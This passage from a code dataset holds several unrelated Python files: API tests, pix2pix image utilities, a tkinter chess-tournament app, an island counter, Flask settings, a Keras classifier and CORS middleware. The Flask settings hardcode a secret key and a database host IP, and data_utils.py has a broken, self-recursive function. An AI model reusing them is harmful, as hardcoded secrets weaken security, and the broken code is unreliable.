self.session.get_request(uri=uri, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n return response\n\n def test_post_attribute_values_list(self):\n get1_response = self.test_get_attribute_values_list()\n before_count = MetadataCommonMethods.get_content_count(get1_response)\n\n uri = items['post_attribute_values_list_uri']\n data = items['post_attribute_values_list_body']\n post_response = self.session.post_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(post_response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (post_response.status_code, (URL+uri)))\n\n get2_response = self.test_get_attribute_values_list()\n after_count = MetadataCommonMethods.get_content_count(get2_response)\n\n self.assertEqual(after_count,int(before_count+1))\n return post_response\n\n def test_put_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n items = metadata.conf.get_all_items(SECTION)\n\n uri = items['put_attribute_values_list_uri']\n data = items['put_attribute_values_list_body']\n response = self.session.put_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL+uri)))\n content_object = json.loads(response.content)[0]\n self.assertEqual(content_object['id'], vid)\n self.assertEqual(content_object['name'], u'测试域更新')\n return response\n\n def test_soft_delete_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n items = metadata.conf.get_all_items(SECTION)\n\n uri = items['soft_delete_attribute_values_list_uri']\n data = items['soft_delete_attribute_values_list_body']\n response = self.session.delete_request(uri=uri, data=data, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL + uri)))\n self.assertEqual(response.content, \"success\")\n return response\n\n def test_hard_delete_attribute_values_list(self):\n post_response = self.test_post_attribute_values_list()\n vid = json.loads(post_response.content)[-1]['id']\n metadata.conf.set_config(SECTION, 'vid', vid)\n 
items = metadata.conf.get_all_items(SECTION)\n\n uri = items['hard_delete_attribute_values_list_uri']\n response = self.session.delete_request(uri=uri, data=None, headers=HEADERS)\n self.assertEqual(response.status_code, 200, msg='%s != 200\\n Request URL is %s' % (response.status_code, (URL + uri)))\n self.assertEqual(response.content, \"success\")\n return response\n\n def tearDown(self):\n self.session.delete_session()\n\nif __name__ == \"__main__\":\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(MetadataAttributeTest)) # build the suite from this module's test case, not the imported helper class\n runner = unittest.TextTestRunner()\n runner.run(suite)","sub_path":"testcases/dp_api/metadata_v1/test_attribute.py","file_name":"test_attribute.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"552392292","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n\ndef imread(idx):\n \"\"\"\n Utility to read the source and target images in RGB format and normalize them\n Parameters:\n idx: type:str. File name of the image pair to be loaded\n Returns:\n A tuple (source, target) of normalized images\n \"\"\"\n img_tgt = plt.imread(\"data/landmarks/\"+idx, format='RGB').astype(np.float)\n img_src = plt.imread(\"data/original/\"+idx, format='RGB').astype(np.float)\n return (img_src/127.5)-1, (img_tgt/127.5)-1\n\n\ndef _get_images(image_list, img_res=[256, 256], is_testing=False):\n \"\"\"\n Utility to process a list of images, resize and randomly perform\n horizontal flips\n Parameters:\n image_path_list: type:list. List of paths of images to be processed\n image_res: type:int list. Array denoting the resized [H,W] of image\n is_testing: type: bool. 
Flag to control random flipping\n Returns:\n yields a tuple of two lists (source,target)\n \"\"\"\n path = os.listdir(path+\"/original\")\n\n num_batches = int(len(path) / batch_size)\n for i in range(num_batches-1):\n batch = path[i*batch_size:(i+1)*batch_size]\n imgs_source, imgs_target = _get_images(batch, img_res, is_testing)\n yield imgs_source, imgs_target\n\n\ndef plot_sample_images(generator,\n path,\n epoch=0,\n batch_num=1,\n output_dir='maps'):\n \"\"\"\n Method to plot sample outputs from generator\n Parameters:\n generator: type:keras model object. Generator model\n path: type:str. Path to dataset\n epoch: type:int. Epoch number, used for output file name\n batch_num: type:int. Batch number, used for output file name\n output_dir: type:str. Path to save generated output samples\n Returns:\n None\n \"\"\"\n\n imgs_source, imgs_target = get_samples(path,\n batch_size=3,\n img_res=[256, 256],\n is_testing=True)\n fake_imgs = generator.predict(imgs_target)\n\n gen_imgs = np.concatenate([imgs_target, fake_imgs, imgs_source])\n\n # scale images 0 - 1\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n os.makedirs(output_dir, exist_ok=True)\n\n titles = ['Condition', 'Generated', 'Original']\n rows, cols = 3, 3\n fig, axs = plt.subplots(rows, cols)\n cnt = 0\n for i in range(rows):\n for j in range(cols):\n axs[i, j].imshow(gen_imgs[cnt])\n axs[i, j].set_title(titles[i])\n axs[i, j].axis('off')\n cnt += 1\n fig.savefig(\"{}/{}_{}.png\".format(output_dir, epoch, batch_num))\n plt.show()\n plt.close()\n","sub_path":"Chapter_8/reenactment_pix2pix/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538699220","text":"from pe_nominal_record import NominalRecord\n\ndef answer():\n \n nr = NominalRecord.from_int(10)\n s = 0\n for x in range(10, 9**5 * 6):\n if sum(d**5 for d in nr) == x:\n s += x\n nr[-1] += 1\n nr.normalise()\n return s\n \nif __name__ == '__main__':\n print(answer())\n","sub_path":"OLD_PY_CODE/project_euler_py/pe0030.py","file_name":"pe0030.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"37111006","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\nfrom typing import List\n\nfrom views.view import View\nfrom models.tournament import Tournament, Tour\nfrom models.players import Player\nfrom models.dataBase import data_base\n\nclass Controller:\n \"\"\"Main controller\"\"\"\n\n def __init__(self):\n self.trounament: List[Tournament] = []\n self.players: List[Player] = []\n self.rounds: List[Tour] = []\n self.tournament_name = []\n self.counter = 0\n\n \"\"\"This section is dedicated fro the building of the round objects:\n it is made by xxxxxx function\n \"\"\"\n #round general data view model\n def create_round_data_view(self, round_name, data: List, command):\n player_full_name = data\n self.label_entry_list = []\n self.round = Tour(round_name)\n\n # remove the previous frame\n self.new_frame.destroy()\n\n # trounament data frame\n self.new_frame = self.view.create_frame(self.view.root, round_name, 600, 400, 1, 0)\n\n # creation of match frame\n match_frame_list = self.round.creating_match_list()\n for i in range(4):\n match_frame_list[i] = self.view.create_frame(self.new_frame, \"match {}\".format(i + 1), 600, 100, 1, i)\n\n # creation of match bracket :\n # creation of label_entry variable\n for i in 
range(4):\n self.label_entry_list.append(\"match_{}_player_1\".format(i + 1))\n self.label_entry_list.append(\"match_{}_player_2\".format(i + 1))\n\n # insertion of the match bracket\n i = 0 # counter used to display the match variable name. it will increase by 2 for each iteration\n j = 0 # counter used to display the player variable name. it will increase by 1 for each iteration\n\n if round_name == \"Round_1\":\n step = 4 #for round 1 player n plays against player n+4( step = 4)\n j_increment = 1\n else:\n step = 1 #for round 2, 3, 4 player n plays against player n+1( step = 1)\n j_increment = 2\n print(\"step is :\", step)\n print(player_full_name)\n for match in match_frame_list:\n self.label_entry_list[i] = self.view.create_entry(match, player_full_name[j][0] , NORMAL, 10, 10)\n self.label_entry_list[i+1] = self.view.create_entry(match, player_full_name[j+step][0] , NORMAL, 10, 40)\n i += 2\n j += j_increment\n\n # button\n self.results_round_data = self.view.create_button(match_frame_list[3], \"Enregister les resultats\", 430, 40)\n self.results_round_data.configure(command= command )\n return self.round\n\n def getting_round_data(self):\n self.getted_round_data = [] #data that will be used to sum the score\n\n j = 0\n for i in range (4):\n score_player_1 = float(self.label_entry_list[j][1].get())\n score_player_2 = float(self.label_entry_list[j+1][1].get())\n if score_player_1 + score_player_2 != 1:\n showinfo(\"verfier le resultats svp!\")\n else:\n self.round.match_result.append( ([self.label_entry_list[j][0][\"text\"],score_player_1],\n [self.label_entry_list[j+1][0][\"text\"],score_player_2]))\n j += 2\n print(self.round.match_result)\n self.rounds.append(self.round)\n print(\"round saved data\", self.round.__dict__)\n return self.rounds\n\n\n #create a tournoi report\n def tournois_data_view(self):\n columnlist = ['tournois name', 'tounois place', 'tournois date', 'tour number']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for tournament in self.trounament:\n #retrive attrebute of tournament object\n list = tournament.__dict__\n intermidate_data = []\n for key,var in list.items():\n intermidate_data.append(var)\n del intermidate_data[-1]\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\n\n # create a player report\n def players_data_view(self):\n columnlist = ['first name', 'last name', 'birthday', 'gender', 'score']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for player in self.players:\n #retrive attrebute of tournament object\n list = player.__dict__\n intermidate_data = []\n for key,var in list.items():\n intermidate_data.append(var)\n\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\n\n #creating round report\n def round_data_view(self):\n \"\"\"columnlist = ['match name', 'player 1', 'score', 'player 2', 'score']\n self.new_frame.destroy()\n self.new_frame = self.view.create_frame(self.view.root, \"rapport\", 600, 400, 1, 0)\n data =[]\n for match in self.rounds:\n #retrive attrebute of tournament object\n list = match.get_player_round_resutl()\n intermidate_data = []\n for result in list:\n intermidate_data.append(result[0])\n intermidate_data.append(result[1])\n\n data.append(intermidate_data)\n\n self.treeviews_tournois_data = 
self.view.create_treeview(self.new_frame, data, columnlist, 10, 10)\"\"\"\n pass\n\n\n def sort_players_results(self):\n #gothering data\n \"#\"\n self.getting_round_data()\n\n lastround = self.rounds[-1]\n # sum the new results with the old one\n self.last_player_round_result = self.rounds[-1].get_player_round_resutl()\n if lastround.tour_name == \"Round_1\":\n pass\n\n else :\n for player_round in self.last_player_round_result:\n #print(player_round)\n for i in range(len(self.rounds)-1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] += item[1]\n\n #added to each player his international rate in order to use it as second way for sorting\n for result in self.last_player_round_result:\n for ref_player in self.reference_data:\n if ref_player[0] == result[0]:\n result.append(ref_player[1])\n\n break\n\n # sorted list based on rate value and socre\n self.last_player_round_result = sorted(self.last_player_round_result,\n key=lambda x: (x[0][1], x[1]), reverse=True)\n\n # remove rate value and return list of tuple (player name, score)\n for item in self.last_player_round_result:\n item.pop(2)\n #remove the previous add result\n if lastround.tour_name == \"Round_1\":\n pass\n\n else :\n for player_round in self.last_player_round_result:\n #print(player_round)\n for i in range(len(self.rounds)-1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] -= item[1]\n\n\n\n\n return self.last_player_round_result\n\n #creating player bracket based on the previous match list\n def creating_round_bracket(self):\n #merged all match in the same list in order to be used for the ckeck during bracket setting\n match_list_data = []\n self.bracket_for_next_round = []\n for round in self.rounds:\n print(\"round match results:\", round.match_result)\n for match in round.match_result:\n print(\"match: \", match)\n match_list_data.append((match[0][0],match[1][0]))\n print(\"*****************************************match list**********************\")\n print(match_list_data)\n\n #creating bracket\n data = self.last_player_round_result\n while len(data) !=0:\n print(len(data))\n for i in range(len(data)-1):\n player_1 = data[0]\n player_2 = data [i+1]\n bracket = (player_1[0],player_2[0])\n print(bracket)\n if not bracket in match_list_data:\n self.bracket_for_next_round.append(player_1)\n self.bracket_for_next_round.append(player_2)\n print(data)\n data.remove(player_1)\n data.remove(player_2)\n print(data)\n break\n print(data)\n\n return self.bracket_for_next_round\n\n #sortted round 4 results\n def tournament_final_result(self):\n self.sort_players_results()\n lastround = self.rounds[-1]\n # sum the new results with the old one\n last_player_round_result = self.rounds[-1].get_player_round_resutl()\n\n print(\"****************************************************************************************\")\n print(\"***************************************analyse of result********************************\")\n for round_item in self.rounds:\n\n print(\"number of round:\", len(self.rounds))\n print(\"result of {} : \".format(round_item.tour_name),round_item.get_player_round_resutl())\n print(\"match reseults:\", round_item.match_result)\n\n print(\"***************************************fin des result***********************************\")\n print(\"****************************************************************************************\")\n\n for player_round in last_player_round_result:\n # 
print(player_round)\n for i in range(len(self.rounds) - 1):\n for item in self.rounds[i].get_player_round_resutl():\n if player_round[0] == item[0]:\n player_round[1] += item[1]\n last_player_round_result = sorted(last_player_round_result,\n key=lambda x: (x[0][1], x[1]), reverse=True)\n print(\"****************************************************************************************\")\n print(\"******************************cumul de result*******************************************\")\n print(last_player_round_result)\n # trounament report button\n tounois_list_button = self.view.create_button(self.menu_frame, \"Tounois_list\", 20, 110)\n tounois_list_button.configure(command=lambda: self.tournois_data_view())\n\n # player report button\n player_list_button = self.view.create_button(self.menu_frame, \"Player_list\", 20, 140)\n player_list_button.configure(command=lambda: self.players_data_view())\n\n # round report button\n round_list_button = self.view.create_button(self.menu_frame, \"tour_list\", 20, 170)\n round_list_button.configure(command=lambda: self.round_data_view())\n\n #create round 4\n def round_4_data_view(self):\n print(\"#################################_Round_4#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_4\", self.creating_round_bracket(), self.tournament_final_result)\n\n #create round 3\n def round_3_data_view(self):\n print(\"#################################_Round_3#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_3\", self.creating_round_bracket(), self.round_4_data_view)\n\n #create round 2\n def round_2_data_view(self):\n print(\"#################################_Round_2#######################################################\")\n self.sort_players_results()\n self.create_round_data_view(\"Round_2\", self.creating_round_bracket(), self.round_3_data_view)\n\n \"\"\"\n self.getting_round_data()\n self.sorted_data_round_1 = self.rounds[0].sorting_round_data(self.reference_data)\n # instruction code for check. will be removed at the last version\n print(self.sorted_data_round_1)\n self.results_bracket_round_1 = self.rounds[0].creating_round_bracket()\n print(self.results_bracket_round_1)\n self.create_round_data_view(\"Round_2\", self.results_bracket_round_1, self.round_3_data_view)\"\"\"\n\n #create round 1\n def round_1_data_view(self):\n print(\"#################################_Round_1#######################################################\")\n # generate sample data\n self.players = sorted(self.players, key=lambda x: ( -x.rate ,x.first_name))\n self.reference_data = []\n for player in self.players:\n self.reference_data.append([str(player.first_name + \" \" + player.last_name), player.rate])\n # instruction code for check. 
will be removed at the last version\n print(self.players)\n print(self.reference_data)\n\n self.create_round_data_view(\"Round_1\", self.reference_data, self.round_2_data_view)\n\n \"\"\"This section is dedicated for the building of the player objects:\n it is made by three functions.\n The first one is needed to select a tournament and enable the function for the entry box.\n The second one is dedicated to the display of the entry box.\n The third one is used to create a player object by getting the entry data and adding it to the player list\"\"\"\n\n #creating player object\n def creating_player(self):\n first_name = self.first_name[1].get()\n last_name = self.last_name[1].get()\n birthday_date = self.birthday_date[1].get()\n gender = self.gender.get()\n rate = self.rate[1].get()\n\n #check empty fields; Entry.get() always returns a string, so test for digits instead of type(rate) != int (which is always true)\n if first_name == '' or last_name == '' or birthday_date == '' or gender == 'None' or not rate.isdigit():\n value = False\n else :\n value = True\n rate = int(rate)\n if value:\n player = Player(first_name, last_name, birthday_date, gender, rate)\n self.players.append(player)\n print(\"attribute of player:\", player.__dict__ )\n\n showinfo(\"\",\"Player data has been saved\")\n self.first_name[1].delete(0, 'end')\n self.last_name[1].delete(0, 'end')\n self.birthday_date[1].delete(0, 'end')\n self.gender.set(None)\n self.rate[1].delete(0, 'end')\n else:\n if first_name == '' or last_name == '' or birthday_date == '' or gender == 'None' or rate == '':\n showinfo(message='fields are empty')\n else:\n showinfo(message='score should be an integer')\n\n if len(self.players) >= 8:\n showinfo(\"message\",\"Le nombre maximal est atteint. \"\n \"Cliquer sur le bouton tours pour générer les paires de parties\")\n self.save_player_data.configure(state=DISABLED)\n round_button = self.view.create_button(self.menu_frame, \"tours\", 20, 80)\n round_button.configure(command=lambda: self.round_1_data_view())\n\n if len(self.players) == 8:\n for player in self.players :\n self.plyers_db_table.insert(player.toJson())\n print(player.toJson())\n\n # creation of player entry for the selected tournament\n def player_data_entry(self, event=None):\n message = ttk.Label(self.new_frame, text=\"Données d'identification du joueur\")\n message.place(x=20, y=70)\n # player data fields\n\n self.first_name = self.view.create_entry(self.new_frame, \"Prénom: \", NORMAL, 50, 120)\n self.last_name = self.view.create_entry(self.new_frame, \"Nom de famille: \", NORMAL, 50, 160)\n self.birthday_date = self.view.create_entry(self.new_frame, \"Date de naissance\", NORMAL,50, 200)\n self.gender = self.view.create_radiobutton(self.new_frame, \"genre\", 50, 240)\n self.rate = self.view.create_entry(self.new_frame, \"cote Elo\", NORMAL, 50, 280)\n\n # button\n self.save_player_data = self.view.create_button(self.new_frame, \"Enregistrer les données du joueur\",375, 330)\n self.save_player_data.configure(command=lambda: self.creating_player())\n\n # creation of player data view\n def create_player_data_view(self):\n # remove the previous frame\n self.new_frame.destroy()\n # player data frame\n self.new_frame = self.view.create_frame(self.view.root,\"Joueurs\", 600, 400, 1, 0)\n #tournament name combobox\n tournament_labelframe = self.view.create_combobox(self.new_frame,\n \"sélectionner le tournoi:\",\n self.tournament_name, 20, 20, )\n tournament_labelframe.bind('<<ComboboxSelected>>', lambda event: self.player_data_entry()) # tkinter virtual event fired when a tournament is picked\n\n \"\"\"This section is dedicated for the building of the tournament objects. 
it is made by two function:\n The first one is dedicated for the display of the entry box\n The second one is used to create tournament object by getting entry data and added it to the tournament list\"\"\"\n\n #creating tournament object\n def creating_tournament(self):\n name = self.name[1].get()\n palce = self.place[1].get()\n date = self.date[1].get()\n number_of_round = self.number_of_round[1].get()\n if name == '' or palce == '' or date == '':\n value = False\n else :\n value = True\n if value:\n self.tournament_1 = Tournament(name, palce, date, number_of_round)\n self.trounament.append(self.tournament_1)\n self.tournament_name.append (name)\n #show information about the creation of the tournament\n showinfo(\"\", \"le tournois {} été crée\". format(name))\n\n #clear entry widgets\n self.name[1].delete(0,'end')\n self.place[1].delete(0,'end')\n self.date[1].delete(0,'end')\n\n #insert tournament data to data base\n self.tournament_db_table.insert(self.tournament_1.toJson())\n\n #code used only for check. it will be removed at the end rev\n print(self.tournament_1.toJson())\n else:\n showinfo(message='fields are empty')\n\n # creation of tournament data view\n def create_tournament_data_view(self):\n #remove the previous\n self.data_frame.destroy()\n # trounament data frame\n self.new_frame = self.view.create_frame(self.view.root, \"Tournoi\", 600, 400, 1, 0)\n\n # tournament data field\n self.name = self.view.create_entry(self.new_frame, \"Nom de tournoi\", NORMAL, 20, 20)\n self.place = self.view.create_entry(self.new_frame, \"Place\", NORMAL, 20, 70)\n self.date = self.view.create_entry(self.new_frame, \"Date\", NORMAL, 20, 120)\n self.number_of_round = self.view.create_entry(self.new_frame, \"Nombre de tours\", NORMAL, 20, 170)\n self.number_of_round[1].insert(0, \"4\")\n\n # creation of button to generate the tournament\n set_tournament = self.view.create_button(self.new_frame, \"cree le tournoi\", 420, 320)\n set_tournament.configure(command=self.creating_tournament)\n\n #creating main view\n def create_main_view (self):\n\n self.view = View()\n self.menu_frame = self.view.create_frame(self.view.root,\"menu\", 150, 400, 0, 0)\n self.data_frame = self.view.create_frame(self.view.root,\"data\", 600, 400, 1, 0)\n\n #creation of menu buttons\n tournament_button=self.view.create_button(self.menu_frame, \"Tournois\",20,20)\n tournament_button.configure(command = self.create_tournament_data_view)\n players_button = self.view.create_button(self.menu_frame, \"Joueurs\", 20, 50)\n players_button.configure(command= self.create_player_data_view)\n\n #creating a database\n chess_database = data_base('chess_data_base')\n chess_database.db_setup()\n self.plyers_db_table = chess_database.db_create_table('players_table')\n self.tournament_db_table = chess_database.db_create_table('tounament_table')\n\n self.view.main()\n\n\nif __name__ == \"__main__\":\n\n controller = Controller()\n vie = controller.create_main_view()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"controllers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"264832043","text":"# Given a matrix of 1s and 0s, return the number of \"islands\" in the matrix. 
A 1 represents land and 0 represents water, so an island is a group of neighboring 1s whose perimeter is surrounded by water.\n\n# For example, this matrix has 4 islands.\n\n# 1 0 0 0 0\n# 0 0 1 1 0\n# 0 1 1 0 0\n# 0 0 0 0 0\n# 1 1 0 0 1\n# 1 1 0 0 1\n\ndef count_islands(M):\n n_rows = len(M)\n n_cols = len(M[0])\n count = 0\n\n # Traverse through the array and look for 1. Call it x\n # After a trace, all surrounding 1's of x are filled with 0. Add 1 to count\n # Move to the next non-zero element\n for i in range(n_rows):\n for j in range(n_cols):\n if M[i][j] == 1:\n trace(M, i, j, n_rows, n_cols)\n count += 1\n return count\n\n\ndef trace(M, i, j, n_rows, n_cols):\n '''\n Detect a 1 and its surrounding 1's, and fill them all with zero.\n '''\n\n if i<0 or j<0 or i>=n_rows or j>=n_cols:\n return \n\n M[i][j] = 0 # Fill with 0 the \"current 1\"\n moves = [(i+1,j), (i-1,j), (i,j+1), (i,j-1)] # Possible directions\n\n for i, j in moves:\n # If next cell is 1, continue tracing\n if 0<= i < n_rows and 0<= j< n_cols and M[i][j] == 1:\n trace(M, i, j, n_rows, n_cols)\n return \n\n\nif __name__ == \"__main__\":\n M = [\n [1, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1]\n ]\n\n print(count_islands(M))","sub_path":"Cracking the Code/count_islands.py","file_name":"count_islands.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"269553160","text":"# -*- coding: utf-8 -*-\nimport os\n\nos_env = os.environ\n\n\nclass Config(object):\n SECRET_KEY = '3nF3Rn0'\n APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory\n PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))\n\n\nclass ProdConfig(Config):\n \"\"\"Production configuration.\"\"\"\n ENV = 'prod'\n DEBUG = False\n DEBUG_TB_ENABLED = False # Disable Debug toolbar\n HOST = '0.0.0.0'\n MONGO_DBNAME = 'chatbot'\n TEMPLATES_AUTO_RELOAD = False\n SERVER_MESSAGE = 'http://localhost:8890/api/v1'\n JOBS = [\n {\n 'id': 'job1',\n 'func': 'app.app:start_jobs',\n 'trigger': 'interval',\n 'hours': 1\n }\n ]\n\n SCHEDULER_API_ENABLED = True\n\n\nclass DevConfig(Config):\n \"\"\"Development configuration.\"\"\"\n HOST = '0.0.0.0'\n ENV = 'dev'\n DEBUG = True\n DEBUG_TB_ENABLED = True\n ASSETS_DEBUG = True # Don't bundle/minify static assets\n CACHE_TYPE = 'simple' # Can be \"memcached\", \"redis\", etc.\n MONGO_DBNAME = 'chatbot'\n TEMPLATES_AUTO_RELOAD = True\n MONGO_HOST = '46.101.137.23'\n SERVER_MESSAGE = 'http://localhost:8890/api/v1'\n JOBS = [\n {\n 'id': 'job1',\n 'func': 'app.app:start_jobs',\n 'trigger': 'interval',\n 'hours': 1\n }\n ]\n\n SCHEDULER_API_ENABLED = True\n\n","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"554466398","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\n\r\n# img = image.load_img(\"C:/Users/ezequielgamer/Desktop/KUARENTENA/PROYECTO INTEGRADOR/API/computer-vision/basedata/training/bueno/0c37fab39da6ded220c3f9ccac8d117c.jpg\")\r\n\r\n# plt.imshow(img) --- command that displays the image\r\n# 
cv2.imread(\"C:/Users/ezequielgamer/Desktop/computer-vision/basedata/training/bueno/0c37fab39da6ded220c3f9ccac8d117c.jpg\").shape -- puedes ver las dimansiones de la imagen\r\n\r\ntrain = ImageDataGenerator(rescale= 1/255)\r\nvalidation = ImageDataGenerator(rescale= 1/255)\r\n\r\ntrain_dataset = train.flow_from_directory('C:/Users/lucho/Desktop/computer-vision/basedata/training/', #cambiar\r\ntarget_size= (200,200),\r\nbatch_size= 3,\r\nclass_mode= 'categorical')\r\n\r\nvalidation_dataset = train.flow_from_directory('C:/Users/lucho/Desktop/computer-vision/basedata/validation/', #cambiar\r\ntarget_size= (200,200),\r\nbatch_size= 3,\r\nclass_mode= 'categorical')\r\n\r\n\r\nprint(train_dataset.class_indices) # Indica que numero le fue asignado a cada clase \r\nprint(train_dataset.classes) # Indicaria el valor de cada una de las imagenes\r\n\r\nmodel = tf.keras.models.Sequential([ tf.keras.layers.Conv2D(16,(3,3),activation= 'relu', input_shape=(200,200,3)),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n #\r\n tf.keras.layers.Conv2D(32,(3,3),activation= 'relu'),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n #\r\n tf.keras.layers.Conv2D(64,(3,3),activation= 'relu'),\r\n tf.keras.layers.MaxPool2D(2,2),\r\n ##\r\n tf.keras.layers.Flatten(),\r\n ##\r\n tf.keras.layers.Dense(512,activation= 'relu'),\r\n ##\r\n tf.keras.layers.Dense(10 ,activation= 'softmax') #Para mas de 2 categorias poner \"softmax\" \r\n])\r\n\r\nmodel.compile(loss= 'categorical_crossentropy',\r\n optimizer= RMSprop(lr= 0.001),\r\n metrics=['categorical_accuracy']) #Datos que se van a visualizar la carga de datos\r\n\r\nmodel.fit = model.fit(train_dataset,\r\n steps_per_epoch = 3,\r\n epochs= 30,\r\n validation_data= validation_dataset) # entrenamiento\r\n\r\n\r\ndir_path = 'C:/Users/lucho/Desktop/computer-vision/basedata/testing' # Se cargan las imagenes de test para ver como clasifica. cambiar\r\n\r\nfor i in os.listdir(dir_path): \r\n img = image.load_img(dir_path+'//'+ i,target_size=(200,200))\r\n plt.imshow(img)\r\n plt.show()\r\n\r\n X = image.img_to_array(img)\r\n X = np.expand_dims(X,axis =0)\r\n images = np.vstack([X])\r\n\r\n val = model.predict(images)\r\n arreglo = val\r\n print(val)\r\n\r\n for j in arreglo:\r\n m=max(j)\r\n p=0\r\n for k in j:\r\n p+=1\r\n if k == m:\r\n break\r\n print(p)\r\n\r\n","sub_path":"src/components/Paginas/Upload/computer-vision/calific.py","file_name":"calific.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"73495186","text":"# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. 
See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Default allowed headers\nimport copy\nimport logging\n\nfrom oslo_config import cfg\nfrom oslo_middleware import base\nimport webob.dec\nimport webob.exc\nimport webob.response\n\n\nLOG = logging.getLogger(__name__)\n\nCORS_OPTS = [\n    cfg.StrOpt('allowed_origin',\n               default=None,\n               help='Indicate whether this resource may be shared with the '\n                    'domain received in the \"origin\" header of the request.'),\n    cfg.BoolOpt('allow_credentials',\n                default=True,\n                help='Indicate that the actual request can include user '\n                     'credentials'),\n    cfg.ListOpt('expose_headers',\n                default=['Content-Type', 'Cache-Control', 'Content-Language',\n                         'Expires', 'Last-Modified', 'Pragma'],\n                help='Indicate which headers are safe to expose to the API. '\n                     'Defaults to HTTP Simple Headers.'),\n    cfg.IntOpt('max_age',\n               default=3600,\n               help='Maximum cache age of CORS preflight requests.'),\n    cfg.ListOpt('allow_methods',\n                default=['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS'],\n                help='Indicate which methods can be used during the actual '\n                     'request.'),\n    cfg.ListOpt('allow_headers',\n                default=['Content-Type', 'Cache-Control', 'Content-Language',\n                         'Expires', 'Last-Modified', 'Pragma'],\n                help='Indicate which header field names may be used during '\n                     'the actual request.')\n]\n\n\ndef filter_factory(global_conf,\n                   allowed_origin,\n                   allow_credentials=True,\n                   expose_headers=None,\n                   max_age=None,\n                   allow_methods=None,\n                   allow_headers=None):\n    '''Factory to support paste.deploy\n\n    :param global_conf: The paste.ini global configuration object (not used).\n    :param allowed_origin: Protocol, host, and port for the allowed origin.\n    :param allow_credentials: Whether to permit credentials.\n    :param expose_headers: A list of headers to expose.\n    :param max_age: Maximum cache duration.\n    :param allow_methods: List of HTTP methods to permit.\n    :param allow_headers: List of HTTP headers to permit from the client.\n    :return:\n    '''\n\n    def filter(app):\n        cors_app = CORS(app)\n        cors_app.add_origin(allowed_origin=allowed_origin,\n                            allow_credentials=allow_credentials,\n                            expose_headers=expose_headers,\n                            max_age=max_age,\n                            allow_methods=allow_methods,\n                            allow_headers=allow_headers)\n        return cors_app\n\n    return filter\n\n\nclass CORS(base.Middleware):\n    \"\"\"CORS Middleware.\n\n    This middleware allows a WSGI app to serve CORS headers for multiple\n    configured domains.\n\n    For more information, see http://www.w3.org/TR/cors/\n    \"\"\"\n\n    simple_headers = [\n        'Content-Type',\n        'Cache-Control',\n        'Content-Language',\n        'Expires',\n        